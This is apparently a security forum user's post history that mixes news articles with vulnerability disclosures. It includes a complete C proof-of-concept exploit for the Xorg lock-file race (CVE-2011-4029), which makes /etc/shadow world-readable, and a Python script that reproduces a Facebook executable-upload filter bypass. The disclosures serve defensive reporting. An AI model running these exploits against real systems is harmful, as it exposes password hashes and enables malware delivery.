Everything posted by Nytro

  1. Undocumented PECOFF

CONSTANT INSECURITY: THINGS YOU DIDN'T KNOW ABOUT (PE) PORTABLE EXECUTABLE FILE FORMAT

One constant challenge of modern security will always be the difference between published and implemented specifications. Evolving projects, by their very nature, open up a host of exploit areas and implementation ambiguities that cannot be fixed. As such, complex documentation such as that for PECOFF or PDF is a goldmine of possibilities. In this talk we will disclose our recent findings about never-before-seen PE (Portable Executable) format malformations. These findings have serious consequences for security and reverse engineering tools and lead to multiple exploit vectors.

PE has been the main executable image file format on the Windows operating system since its introduction in Windows NT 18 years ago. The PE file format can be found on numerous Windows-based devices including PCs, mobile and gaming devices, BIOS environments and others. Understanding it properly is the key to securing these platforms.

The talk will focus on all aspects of PE file format parsing that lead to undesired behavior or prevent security and reverse engineering tools from inspecting malformed files due to incorrect parsing. Special attention will be given to the differences between the PECOFF documentation and the actual implementation in the operating system loader. With respect to these differences we will demonstrate the existence of files that cannot possibly be considered valid from a documentation standpoint but which are still correctly processed and loaded by the operating system. These differences and numerous design logic flaws can lead to PE processing errors that have serious and hardly detectable security implications. The effects of these PE file format malformations will be compared against several reverse engineering tools, security applications and unpacking systems.

Special attention will be given to the following PE file format aspects and the consequences of their malformation:
- the general PE header layout with respect to data positioning, and the consequences of the different memory model implementations specified by the PECOFF documentation;
- the use of multiple PE headers in a single file, along with self-destructing headers;
- alignment fields and their impact on disk and memory layout, with the section layout issues that can occur due to disk or memory data overlapping or splicing.

In addition to this, the section table content will be inspected for data hiding issues and its limits will be tested for upper and lower content boundaries. We will demonstrate how such issues affect existing static and dynamic PE unpacking systems. Data tables, including imports and exports, will be discussed in detail to show how their malformed content can break analysis tools while still being considered valid by the operating system loader. We will demonstrate the existence of files that can misuse existing PE features in order to cloak important file information and hinder the reverse engineering process. Furthermore, based upon these methods, a unique undetectable method of API hooking that requires no code for hook insertion will be presented. The PE file format will be inspected for integer overflows and we will show how their presence can lead to arbitrary code execution in otherwise safe analysis environments. We will show how PE fields themselves could be used to deliver a code payload, resulting in a completely new field of programming: via the file format itself.

In addition to single-field and single-table malformations, more complex ones involving multiple fields and tables will also be discussed. As a demonstration of such a use case, a unique malformation requiring multiple fields working together to establish custom file encryption will be presented. This simple yet effective encryption, reversed at runtime by the operating system loader itself, requires no code in the malformed binary to be executed. Its effectiveness lies in a unique approach to encryption through file format features themselves, which prevents static and dynamic file analysis tools from processing such files.

This talk will be a Black Hat exclusive. The whitepaper accompanying the presentation materials will contain a detailed description of all malformations discussed during the talk. This whitepaper aims to be mandatory reading material for security analysts, and it will continue to be maintained as new information on PE format malformations is discovered.

Slides: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Slides.pdf
Download whitepaper: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Whitepaper.pdf

Sursa: ReversingLabs vulnerability advisory | www.reversinglabs.com | Reverse Engineering & Software Protection
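To make the header fields mentioned above concrete, here is a minimal, hedged sketch (mine, not taken from the talk or whitepaper) that walks the documented PECOFF layout with Python's struct module: e_lfanew, the COFF header, the alignment fields and the section table. It performs none of the loader-style validation the talk is about, which is exactly why malformed files break this kind of naive parser.

# Minimal PE header walk for illustration only; offsets follow the published
# PECOFF layout and no loader-style sanity checking is done.
import struct, sys

def dump_pe(path):
    data = open(path, "rb").read()
    assert data[:2] == b"MZ", "missing DOS signature"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # offset of "PE\0\0"
    assert data[e_lfanew:e_lfanew + 4] == b"PE\0\0", "missing PE signature"
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]  # SizeOfOptionalHeader
    # SectionAlignment / FileAlignment sit at offset 32/36 of the optional header
    sect_align, file_align = struct.unpack_from("<II", data, e_lfanew + 24 + 32)
    print("machine=%#x sections=%d SectionAlignment=%#x FileAlignment=%#x"
          % (machine, nsections, sect_align, file_align))
    # The section table starts right after the optional header.
    off = e_lfanew + 24 + opt_size
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off + i * 40)
        print(name.rstrip(b"\0"), "VA", hex(va), "VSize", hex(vsize),
              "RawPtr", hex(rawptr), "RawSize", hex(rawsize))

if __name__ == "__main__":
    dump_pe(sys.argv[1])
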
  2. Nytro

    Nelamurire

    It's good that you posted here. First of all, I don't see what reason anyone would have for wanting to become a VIP. Right now the VIPs are the forum's older members, people we know and whose abilities we are sure of, people who have contributed a great deal. Where there are VIPs without very many posts, they are people who have proven their qualities through various actions and shown us that they are "special", and this is a simple way of rewarding them. Basically, through VIP we gather the members we are happy with. That said, some housekeeping is needed there; I want to hand out another 2-3 VIP ranks, but I haven't really had time to follow the forum. There aren't a great many advantages: we don't keep logs or that kind of nonsense in the special category, but VIP members do have a say in the changes made around here. Beyond that, since we know each other, we can help one another even without posting in the special category; when one of us needs something, someone is always found to help, and so on. To become a VIP you basically have to post. What you post doesn't matter, that's up to you. From what you post we get a sense of your knowledge and of the way you think, and that is how this status is earned. And while we're at it, throw in a bottle of whisky and we'll talk on different terms.
  3. Hackers Wanted / Hackers Are People Too: a documentary from Discovery about hacking. Forget crap like the 1995 movie Hackers, where two losers hammer away at the keyboard in desperation, get past firewalls, and who knows what other embarrassments...
  4. I don't agree with information theft either (yeah, sure, Filelist passwords, how terribly interesting), but what he posted there is off. Oh well, that is advertising too; we'll end up with fans of account theft.
  5. Get yourself a grammar book and a work of English literature that you read with a dictionary next to you. Then move on to the listening and speaking part; you need someone who knows English and knows how to pronounce it properly... You can also watch films in English without subtitles.
  6. The Kernel Panel at LinuxCon Europe Wednesday, 26 October 2011 14:31 Nathan Willis Linux users got a rare opportunity to hear directly from the hackers at the core of the Linux kernel on Wednesday at LinuxCon Europe. Read on for more on the state of ARM in the Linux kernel, the need for new kernel contributors, and the death of the Big Kernel Lock (BKL). Linus Torvalds and other kernel developers sat down for a question and answer session at the first LinuxCon Europe. Lennart Poettering, creator of PulseAudio and systemd, served as moderator for the panel, which consisted of Torvalds, Alan Cox, Thomas Gleixner, and Paul McKenney. The four took prepared questions from Poettering, as well as responding to impromptu audience member questions on every topic from version numbers to the future of the kernel project itself. The panelists introduced themselves first. Torvalds, of course, is the leader of the project. Cox works primarily in system-on-chip these days (although he has had other roles in the past). Gleixner maintains the real-time patches. McKenney works on the read-copy-update (RCU) mechanism. Together they account for just a tiny fraction of the kernel community, but by their roles and experience offer keen insights into the health of the kernel, the health of the kernel community, and the directions it is heading. Poettering opened by asking the group about a frequently-quoted comment by Torvalds that breaking userspace compatibility was something that had to be avoided at all costs. A nice sentiment, Poettering said, but one that sounds hypocritical considering how often the kernel team really does break compatibility with its releases — sometimes even with trivial changes like the switch from 2.6.x version numbers to 3.0 that happened earlier this year. Torvalds pointed out that any program which assumed that the kernel's version number would always start with a "2" was broken already, but that the kernel team had also added a "compatibility" mode that would report its version number as 2.6.40 if buggy programs needed it. That encapsulated the kernel team's approach: add something new, but do everything possible to make sure that the old way of doing things continued to work. Torvalds added that he used to keep ancient binaries around — including the very first shells written for Linux, which used APIs that were deprecated within months — to test against each new kernel release, just to make sure that old code continued to run. API stability is important, he said, but it flows out of not breaking the user experience. "No project is more important than the users of that project," he summarized. Next, Poettering asked if there was an aging problem with the core kernel development team, noting that the average age of the subsystem maintainers was growing. Torvalds said no, but that it sometimes seemed like it simply because it takes time for a new contributor to "graduate" from maintaining a single driver to managing a set, and eventually to managing an entire subsystem. The others agreed; Cox added that there was plenty of "fresh blood" in the project, in fact more than enough, but there was a bigger problem in the gender gap — a problem that no one seemed able to fix, despite years of trying. Most of the female kernel contributors today work for commercial vendors, he said; with very few participating because of their own hobbyist interest. 
Torvalds added that another reason it often seems like the kernel crowd is aging rapidly is how ridiculously young they were when they started: he was only 20 himself, and several other key contributors were still teenagers.

Audience members asked questions from microphones placed at the edge of the stage, and several had questions about specific features: the Big Kernel Lock (BKL), the complexity of the ARM tree, and whether or not embedded Linux developers were given as much attention as developers working on desktop and server platforms. Cox reminisced about the BKL, which he called the right solution for the early days of multi-processor support in Linux, even though it had subsequently taken years to replace with more sophisticated methods. It was always a nuisance, he said, but it got Linux SMP support much faster than other OSes, such as the BSDs.

The ARM architecture was controversial in recent months, after Torvalds had to resort to tough talk to get the ARM family to clean up its code and standardize more. The situation is much better today, Torvalds reported. The problem, he said, is that while ARM has a standardized instruction set for the processor, every ARM board has a different approach to other important things like timers and interrupts. Intel had never faced such a glut of incompatible standards for the x86 architecture because the PC platform was so uniform, so it has taken a while for ARM to see the need to take a more active approach towards standardization. Torvalds also said that for the most part the kernel team is very interested in embedded development; what gets tricky is that most embedded Linux devices are designed to be built once and never upgraded. That makes it harder to do testing and ongoing kernel support for embedded platforms.

When asked about the challenges facing the Linux kernel over the next few years, McKenney cited a number of research topics facing all operating systems: scalability, real-time, and validation, to name a few. Torvalds said the challenge is maintaining the right balance between complexity and the ability to get things done. The sheer amount of new hardware that comes out every year is overwhelming, he said; keeping up with it is a practical (though not theoretical) challenge for the team.

Speaking of the practical, one audience member asked Torvalds what his process was when getting a new pull request from a contributor. "I manage by trusting people," he replied. Whenever a pull request comes in, he looks at the person who sent it. Depending on the person, his process varies: some people have earned enough trust over the years that he believes in their judgment, while others have their own recurring issues that mandate additional review. In any case, he said, he makes sure that the new code compiles on his own machine because he "hates it" when he can't compile for his own configuration. But for the most part, he said, his role is no longer to validate individual pieces of code, but to orchestrate the work of others. If he knows two people are working in a similar part of the kernel, he needs to be aware of it to avert clashes, but he trusts the maintainers of their individual subsections. That trust is given to the person, he reiterated; the individual earns it, not the company that the individual might work for.

The panel touched on other areas as well, including security, cgroups, and subsystem bloat. In each case, what comes across in a panel discussion such as this is how human the process of writing and maintaining the kernel is.
The kernel team can make mistakes, and they have to route around them with bugfixes in subsequent releases. Maintainers may not be interested in a particular area of development, but they will look at and even integrate the patches because they are important to a subset of developers or kernel users. The kernel may have steep technical challenges, but just as real a threat to productivity is burnout among maintainers. It is fun to watch the kernel team wisecrack and comment on stage, but it is also a healthy reminder that above all else, Linux is a collaborative project, not simply lines of code. Sursa: http://www.linux.com/learn/tutorials/499287:the-kernel-panel-at-linuxcon-europe
  7. Facebook Tests Security Features By Antone Gonsalves, CRN October 27, 2011 7:42 PM ET Facebook is testing security features that boost password protection for third-party applications and make it easier to reactivate accounts hijacked by hackers. Facebook unveiled App Passwords and Trusted Friends Wednesday, saying they would be testing the features over the “coming weeks.” The announcement is the latest effort by Facebook to improve safety on the site, which is a favorite target of cyber-criminals looking to dupe the social network’s 800 million users worldwide. Trusted Friends is like giving a bosom buddy the key to your house in case you get locked out. A user selects three to five friends that Facebook will send a secret code to pass along, if the account holder can’t get into the site. This sometimes happens when a hacker hijacks someone’s Facebook account and changes the password. App Passwords provides a higher level of security for logging in to third-party applications. A growing number of Web applications allow people to log in using their Facebook credentials. As an alternative, a unique password can be generated by going to Account Settings, then the Security tab and finally to the App Passwords section. Entering an e-mail address and the Facebook-generated password should get a person into the app. The password doesn’t have to be remembered, because Facebook can generate it anytime. Facebook announced the features the same day a security researcher reported a flaw that makes it possible to send a message on Facebook with an executable file attached. Such malware is often sent by cyber-criminals attempting to secretly gain control of people’s PCs. Nathan Power, director of a professional group called the Ohio Information Security Forum, discovered the workaround for Facebook’s security mechanism that prevents sending executables. Power reported the vulnerability to Facebook September 30, and said the vendor acknowledged the flaw Wednesday. Sursa: http://www.crn.com/news/security/231901834/facebook-tests-security-features.htm
  8. TDL4 botnet may be available for rent
27 October 2011

ESET's senior research fellow David Harley says that, while his team of researchers have been tracking the TDL4 botnet for some time, they have noticed a new phase in its evolution. These changes, he noted, may signal that either the team developing the malware has changed or that the developers have started selling a bootkit builder to other cybercriminal groups on a rental basis.

The dropper for the botnet, he asserted, sends copious tracing information to the command-and-control server during the installation of the rootkit onto the system. In the event of any error, he said, it sends a comprehensive error message that gives the malware developers enough information to determine the cause of the fault. All of this, wrote Harley in his latest security posting, suggests that this bot is still under development.

"We also found a form of countermeasure against bot trackers based on virtual machines: during the installation of the malware it checks on whether the dropper is being run in a virtual machine environment and this information is sent to the command-and-control server. Of course, malware that checks on whether it is running in a virtual environment is far from unusual in modern malware, but in this form it's kind of novel for TDL", he said.

One of the most interesting evolutions of the botnet, Infosecurity notes, is that the layout of the hidden file system has also been changed. In contrast to the previous version, which Harley said is capable of storing at most 15 files (regardless of the size of the reserved space), the capacity of the new file system is limited only by the length of the malicious partition. The file system presented by the latest modification of the malware is more advanced than previous versions, noted Harley, adding that, as an example, the malware is able to detect corruption of the files stored in the hidden file system by calculating a CRC32 checksum and comparing it with the value stored in the file header. In the event that a file is corrupted, it is removed from the file system.

Over at Avecto, Mark Austin, the Windows privilege management specialist, said that the removal of admin rights can add an extra layer of defence in the ongoing battle against the malware coders. "TDL-4 is a damaging piece of code that takes the competitor-removing aspects of darkware we saw with SpyEye (and its ability to detect and delete Zeus) and adds all manner of evasive technologies that make conventional pattern/heuristic analyses a lot more difficult", he explained.

The removal of admin rights, he went on to say, is a powerful option as part of a multi-layered IT security strategy in the constant battle against darkware in all its shapes and forms. "Even if you are unfortunate enough to find one or more user accounts have been compromised by a phishing attack, for example, the fact that the account(s) are limited in what they can do helps to reduce the effects of the security problem", he added.

Malware like this, said Austin, is almost certain to evolve, with cybercriminals repurposing elements of what is essentially a modular suite of malware, adding enhancements to certain features, deleting older code, and adding new elements to take advantage of newly-discovered attack vectors. "It isn't rocket science that will defeat new evolutions of existing malware, or for that matter completely new darkware code.
What is needed is a carefully planned strategy, with well thought out implementations that use multiple elements of security which, when combined, are greater than the sum of their components”, he said. “Privileged account management can greatly assist IT professionals in this regard, as it adds an extra string to their defensive bow. This is all part of the GRC – governance, risk management and compliance – balancing act that is modern IT security management”, he added. Sursa: http://www.infosecurity-magazine.com/view/21651/tdl4-botnet-may-be-available-for-rent/
  9. Google Denies Requests To Remove Videos of Police Brutality By Jon Mitchell / October 27, 2011 4:45 PM In a show of good faith today, Google touted the fact that it has refused to cooperate with local law enforcement agencies in the U.S. who requested the removal of YouTube videos of police brutality and criticisms of law enforcement officials. Google cited its transparency report from the first half of this year, but to mention it today is telling. With violent crackdowns at Occupy Oakland this week, citizen media like YouTube have been a vital channel. From Google's mid-year transparency report: "We received a request from a local law enforcement agency to remove YouTube videos of police brutality, which we did not remove. Separately, we received requests from a different local law enforcement agency for removal of videos allegedly defaming law enforcement officials. We did not comply with those requests, which we have categorized in this Report as defamation requests." http://www.youtube.com/watch?feature=player_embedded&v=uRfjX7vHxM4 "The whole world is watching," as protesters around the country have reminded officials since they first began to occupy Wall Street. With this week's escalations, now would not be a good time for Google to engage in censorship. The wording of its notice about denying the removal requests is encouraging, but it's carefully chosen to suit a particular situation. Google complies with 93% of U.S. removal requests. It has decided that the best course of action is to maintain transparency and respond on a case-by-case basis. That transparency has upset governments, and the refusal to censor police brutality videos surely made some city officials unhappy. But Google's record is spotty. Just this month, it handed over a WikiLeaks volunteer's Gmail data to the U.S. government, which used an old and controversial law to request it without a warrant from a judge. Google is pushing for updated laws that better reflect the media of today, but in the meantime, its record on upholding free speech is touch-and-go. Google has done the right thing with these police takedown requests, but the world should keep watching. What do you think Google's responsibilities are regarding government requests? Sursa: Google Denies Requests To Remove Videos of Police Brutality [uPDATED]
  10. Xorg permission change vulnerability

From: vladz <vladz () devzero fr>

Hi list,

A couple of weeks ago, I found a permission change vulnerability in the way that Xorg handled its lock files. Once exploited, it allowed a local user to modify the file permissions of an arbitrary file to 444 (read for all). It has been assigned CVE-2011-4029, X.org released a patch on 2011/10/18, and now I thought I could share the vulnerability description and its original PoC.

POC: http://vladz.devzero.fr/Xorg-CVE-2011-4029.txt

Author: vladz <vladz@devzero.fr> (new on twitter @v14dz!)
Description: Xorg permission change vulnerability (CVE-2011-4029)
Product: X.Org (http://www.x.org/releases/)
Affected: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USE_CHMOD preprocessor identifier.
PoC tested on: Debian 6.0.2 up to date with X default configuration issued from the xserver-xorg-core package (version 2:1.7.7-13)

Follow-up:
2011/10/07 - X.org foundation informed
2011/10/09 - Distros informed
2011/10/18 - Issue/patch publicly announced

Introduction
------------

I've found a file permission change vulnerability in the way that Xorg creates its temporary lock file "/tmp/.tXn-lock" (where 'n' is the X display). When exploited, this vulnerability allows a non-root user to set the read permission for all users on any file or directory. For the exploit to succeed, the local attacker needs to be able to run the X.Org X11 X server.

NOTE: At this time (26/10/2010), some distros are still vulnerable (see "Fix & Patch" below for more information).

Description
-----------

Once started, Xorg attempts to create a lock file "/tmp/.Xn-lock" in a secure manner: it creates/opens a temporary lock file "/tmp/.tXn-lock" with the O_EXCL flag, writes the current PID into it, links it to the final "/tmp/.Xn-lock" and unlinks "/tmp/.tXn-lock". Here is the code:

$ cat -n os/utils.c
[...]
   288  /*
   289   * Create a temporary file containing our PID. Attempt three times
   290   * to create the file.
   291   */
   292      StillLocking = TRUE;
   293      i = 0;
   294      do {
   295          i++;
   296          lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644);
   297          if (lfd < 0)
   298              sleep(2);
   299          else
   300              break;
   301      } while (i < 3);
   302      if (lfd < 0) {
   303          unlink(tmp);
   304          i = 0;
   305          do {
   306              i++;
   307              lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644);
   308              if (lfd < 0)
   309                  sleep(2);
   310              else
   311                  break;
   312          } while (i < 3);
   313      }
   314      if (lfd < 0)
   315          FatalError("Could not create lock file in %s\n", tmp);
   316      (void) sprintf(pid_str, "%10ld\n", (long)getpid());
   317      (void) write(lfd, pid_str, 11);
   318      (void) chmod(tmp, 0444);
   319      (void) close(lfd);
[...]
   328      haslock = (link(tmp,LockFile) == 0);
   329      if (haslock) {
   330          /*
   331           * We're done.
   332           */
   333          break;
   334      }
   335      else {
   336          /*
   337           * Read the pid from the existing file
   338           */
   339          lfd = open(LockFile, O_RDONLY);
   340          if (lfd < 0) {
   341              unlink(tmp);
   342              FatalError("Can't read lock file %s\n", LockFile);
   343          }
[...]

As a reminder, chmod() operates on filenames rather than on file handles. So in this case, at line 318, there is no guarantee that the file "/tmp/.tXn-lock" still refers to the same file on disk that it did when it was opened via the open() call. See the TOCTOU vulnerability explained on OWASP[1] for more information.

The idea here is to remove and replace (with a malicious symbolic link) the "tmp" file ("/tmp/.tXn-lock") between the call to open() at line 296 and the call to chmod() at line 318. But for a non-root user, removing this file looks impossible as it is located in a sticky-bit directory ("/tmp") and owned by root.

But what if we launch two Xorg processes with an initial offset (a few milliseconds), so that the first process unlink()s (line 341) the "tmp" file right before the second process calls chmod()? This race condition consists of placing unlink() between open() and chmod(). It sounds very difficult because there is only one system call between them (and maybe not enough time to perform unlink() and create our symbolic link):

# strace X :1
[...]
open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0
write(0, " 2192\n", 11) = 11
chmod("/tmp/.tX1-lock", 0444) = 0

Anyway, we can make this possible by sending the signals SIGCONT and SIGSTOP[2] to our process. As they are not trapped by the program, they will allow us to control and regulate (by stopping and resuming) the execution flow. Here is how to proceed:

1) launch the X wrapper (pid=n)
2) stop it (by sending SIGSTOP to 'n') right after "/tmp/.tX1-lock" is created (this actually means that the next instruction is chmod())
3) launch another X process to unlink() /tmp/.tX1-lock
4) create the symbolic link "/tmp/.tX1-lock" -> "/etc/shadow"
5) send SIGCONT to 'n' to perform chmod() on our link

The minor problem is that when launching X several times (for race purposes), it makes the console switch between X and the TTY, and in some cases it freezes the screen and disturbs the attack. The solution is to make X exit before it switches, by creating a link "/tmp/.Xn-lock" (the real lock filename) to a file that doesn't exist. This will make the open() call fail at line 339 and quit with FatalError() at line 342. So before our 5 steps, we just need to add:

0) create the symbolic link "/tmp/.X1-lock" -> "/dontexist"

Proof Of Concept
----------------

/* xchmod.c -- Xorg file permission change vulnerability PoC

   This PoC sets the rights 444 (read for all) on any file specified as
   argument (default file is "/etc/shadow"). Another good use for an attacker
   would be to dump an entire partition in order to disclose its full content
   later (via a "mount -o loop"). Made for EDUCATIONAL PURPOSES ONLY!
   CVE-2011-4029 has been assigned.

   In some configurations, this exploit must be launched from a TTY (switch
   by typing Ctrl-Alt-Fn). Tested on Debian 6.0.2 up to date with X default
   configuration issued from the xserver-xorg-core package (version 2:1.7.7-13).

   Compile: cc xchmod.c -o xchmod
   Usage:   ./xchmod [/path/to/file]   (default file is /etc/shadow)

   $ ls -l /etc/shadow
   -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
   $ ./xchmod
   [+] Trying to stop a Xorg process right before chmod()
   [+] Process ID 4134 stopped (SIGSTOP sent)
   [+] Removing /tmp/.tX1-lock by launching another Xorg process
   [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
   [+] Process ID 4134 resumed (SIGCONT sent)
   [+] Attack succeeded, ls -l /etc/shadow:
   -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow

   -----------------------------------------------------------------------
   "THE BEER-WARE LICENSE" (Revision 42): <vladz@devzero.fr> wrote this file.
   As long as you retain this notice you can do whatever you want with this
   stuff. If we meet some day, and you think this stuff is worth it, you can
   buy me a beer in return.  -V. */

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <syscall.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>

#define XORG_BIN "/usr/bin/X"
#define DISPLAY  ":1"

char *get_tty_number(void) {
  char tty_name[128], *ptr;

  memset(tty_name, '\0', sizeof(tty_name));
  readlink("/proc/self/fd/0", tty_name, sizeof(tty_name));
  if ((ptr = strstr(tty_name, "tty")))
    return ptr + 3;
  return NULL;
}

int launch_xorg_instance(void) {
  int child_pid;
  char *opt[] = { XORG_BIN, DISPLAY, NULL };

  if ((child_pid = fork()) == 0) {
    close(1);
    close(2);
    execve(XORG_BIN, opt, NULL);
    _exit(0);
  }
  return child_pid;
}

void show_target_file(char *file) {
  char cmd[128];

  memset(cmd, '\0', sizeof(cmd));
  sprintf(cmd, "/bin/ls -l %s", file);
  system(cmd);
}

int main(int argc, char **argv) {
  pid_t proc;
  struct stat st;
  int n, ret, current_attempt = 800;
  char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;

  if (argc < 2)
    strcpy(target_file, "/etc/shadow");
  else
    strcpy(target_file, argv[1]);

  sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
  sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);

  /* we must ensure that Xorg is not already running on this display */
  if (stat(lockfile, &st) == 0) {
    printf("[-] %s exists, maybe Xorg is already running on this"
           " display? Choose another display by editing the DISPLAY"
           " attributes.\n", lockfile);
    return 1;
  }

  /* this avoid execution to continue (and automatically switch to another
   * TTY). Xorg quits with fatal error because the file that /tmp/.X?-lock
   * links does not exist. */
  symlink("/dontexist", lockfile);

  /* we have to force this mask to not comprise our later checks */
  umask(077);

  ttyno = get_tty_number();

  printf("[+] Trying to stop a Xorg process right before chmod()\n");
  while (--current_attempt) {
    proc = launch_xorg_instance();
    n = 0;
    while (n++ < 10000)
      if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
        break;

    if (ret == 0) {
      syscall(SYS_kill, proc, SIGSTOP);
      printf("[+] Process ID %d stopped (SIGSTOP sent)\n", proc);
      stat(lockfiletmp, &st);
      if ((st.st_mode & 4) == 0)
        break;
      printf("[-] %s file has wrong rights (%o)\n"
             "[+] removing it by launching another Xorg process\n",
             lockfiletmp, st.st_mode);
      launch_xorg_instance();
      sleep(7);
    }
    kill(proc, SIGKILL);
  }

  if (current_attempt == 0) {
    printf("[-] Attack failed.\n");
    if (!ttyno)
      printf("Try with console ownership: switch to a TTY* by using "
             "Ctrl-Alt-F[1-6] and try again.\n");
    return 1;
  }

  printf("[+] Removing %s by launching another Xorg process\n", lockfiletmp);
  launch_xorg_instance();
  sleep(7);

  if (stat(lockfiletmp, &st) == 0) {
    printf("[-] %s lock file still here... \n", lockfiletmp);
    return 1;
  }

  printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp, target_file);
  symlink(target_file, lockfiletmp);

  printf("[+] Process ID %d resumed (SIGCONT sent)\n", proc);
  kill(proc, SIGCONT);

  /* wait for chmod() to finish */
  usleep(300000);

  stat(target_file, &st);
  if (!(st.st_mode & 004)) {
    printf("[-] Attack failed, rights are %o. Try again!\n", st.st_mode);
    return 1;
  }

  /* cleaning temporary link */
  unlink(lockfile);

  printf("[+] Attack succeeded, ls -l %s:\n", target_file);
  show_target_file(target_file);
  return 0;
}

Fix & Patch
-----------

A fix for this vulnerability is available and will be included in xserver 1.11.2 and xserver 1.12.

http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4

Some distros released new Xorg packages (Ubuntu, Gentoo), while others (like Debian) judge this a non-critical issue:

http://security-tracker.debian.org/tracker/CVE-2011-4029

Footnotes & links
-----------------

[1] https://www.owasp.org/index.php/File_Access_Race_Condition:_TOCTOU
[2] http://en.wikipedia.org/wiki/SIGCONT "SIGCONT is the signal sent to restart a process previously paused by the SIGSTOP signal".

Sursa: Full Disclosure: Xorg file permission change PoC (CVE-2011-4029)

PS: the date in "At this time (26/10/2010)" is presumably meant to be 2011.
  11. Facebook Attach EXE Vulnerability
OCTOBER 27, 2011

1. Summary:
When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered that subverts this security mechanism. Note that you do NOT have to be friends with the user to send them a message with an attachment.

2. Description:
When attaching an executable file, Facebook will return an error message stating: "Error Uploading: You cannot attach files of that type." When uploading a file attachment to Facebook we captured the web browser's POST request being sent to the web server. Inside this POST request is the line:

Content-Disposition: form-data; name="attachment"; filename="cmd.exe"

It was discovered that the variable 'filename' was being parsed to determine whether the file type is allowed or not. To subvert the security mechanism and allow an .exe file type, we modified the POST request by appending a space to our filename variable, like so:

filename="cmd.exe "

This was enough to trick the parser and allow our executable file to be attached and sent in a message.

3. Impact:
Could potentially allow an attacker to compromise a victim's computer system.

4. Affected Products: www.facebook.com

5. Time Table:
09/30/2011 Reported Vulnerability to the Vendor
10/26/2011 Vendor Acknowledged Vulnerability
10/27/2011 Publicly Disclosed

6. Credits:
Discovered by Nathan Power
www.securitypentest.com

Sursa: http://www.securitypentest.com/2011/10/facebook-attach-exe-vulnerability.html
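For illustration, here is a hedged Python sketch of the kind of multipart request described in the advisory: a trailing space is appended to the filename to confuse an extension blacklist. The endpoint URL and field name are stand-ins for a test service you control, not Facebook's real upload API, and the original flaw was acknowledged by the vendor back in 2011.

# Illustrative only: build a multipart upload whose filename ends in a space,
# the trick described above, against a hypothetical endpoint you control.
import requests

UPLOAD_URL = "https://upload.example.test/attach"   # hypothetical test endpoint

def upload_with_trailing_space(path):
    # The tuple is (filename, fileobj, content_type); note the trailing space
    # after ".exe", which is what tricked the extension check in 2011.
    files = {"attachment": ("cmd.exe ", open(path, "rb"), "application/octet-stream")}
    return requests.post(UPLOAD_URL, files=files)

if __name__ == "__main__":
    resp = upload_with_trailing_space("cmd.exe")
    print(resp.status_code, resp.text[:200])
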
  12. How secure is HTTPS today? How often is it attacked?
OCTOBER 25, 2011 - 12:55PM | BY PETER ECKERSLEY

This is part 1 of a series on the security of HTTPS and TLS/SSL.

HTTPS is a lot more secure than HTTP! If a site uses accounts, or publishes material that people might prefer to read in private, the site should be protected with HTTPS. Unfortunately, it is still feasible for some attackers to break HTTPS. Leaving aside cryptographic protocol vulnerabilities, there are structural ways for its authentication mechanism to be fooled for any domain, including mail.google.com, www.citibank.com, www.eff.org, addons.mozilla.org, or any other incredibly sensitive service:

- Break into any Certificate Authority (or compromise the web applications that feed into it). As we learned from the SSL Observatory project, there are 600+ Certificate Authorities that your browser will trust; the attacker only needs to find one of those 600 that she is capable of breaking into. This has been happening with catastrophic results.
- Compromise a router near any Certificate Authority, so that you can read the CA's outgoing email or alter incoming DNS packets, breaking domain validation. Or similarly, compromise a router near the victim site to read incoming email or outgoing DNS responses. Note that SMTPS email encryption does not help because STARTTLS is vulnerable to downgrade attacks.
- Compromise a recursive DNS server that is used by a Certificate Authority, or forge a DNS entry for a victim domain (which has sometimes been quite easy). Again, this defeats domain validation.
- Attack some other network protocol, such as TCP or BGP, in a way that grants access to emails to the victim domain.
- A government could order a Certificate Authority to produce a malicious certificate for any domain. There is circumstantial evidence that this may happen. And because CAs are located in 52+ countries, there are lots of governments that can do this, including some deeply authoritarian ones. Also, governments could easily perform any of the above network attacks against CAs in other countries.

In short: there are a lot of ways to break HTTPS/TLS/SSL today, even when websites do everything right. As currently implemented, the Web's security protocols may be good enough to protect against attackers with limited time and motivation, but they are inadequate for a world in which geopolitical and business contests are increasingly being played out through attacks against the security of computer systems.

How often are these attacks occurring?

[update 10/27/2011: there was an error in our manual de-duplication of CA organizations. Rather than 15 total compromised organizations and 5 since June, the CRLs indicate 14 total and 4 since June]

At USENIX Security this year, Jesse Burns and I reported a number of findings that came from studying all of the Certificate Revocation Lists (CRLs) that are published by CAs seen by the SSL Observatory. One interesting feature of X.509 Certificate Revocation Lists is that they contain fields explaining the reason for revocations.
As of last week, a scan of all the CRLs seen previously by the Observatory showed the following tallies:

+------------------------+-------------+
| reason                 | occurrences |
+------------------------+-------------+
| NULL                   |      921683 |
| Affiliation Changed    |       41438 |
| CA Compromise          |         248 |
| Certificate Hold       |       80371 |
| Cessation Of Operation |      690905 |
| Key Compromise         |       73345 |
| Privilege Withdrawn    |        4622 |
| Superseded             |       81021 |
| Unspecified            |      168993 |
+------------------------+-------------+

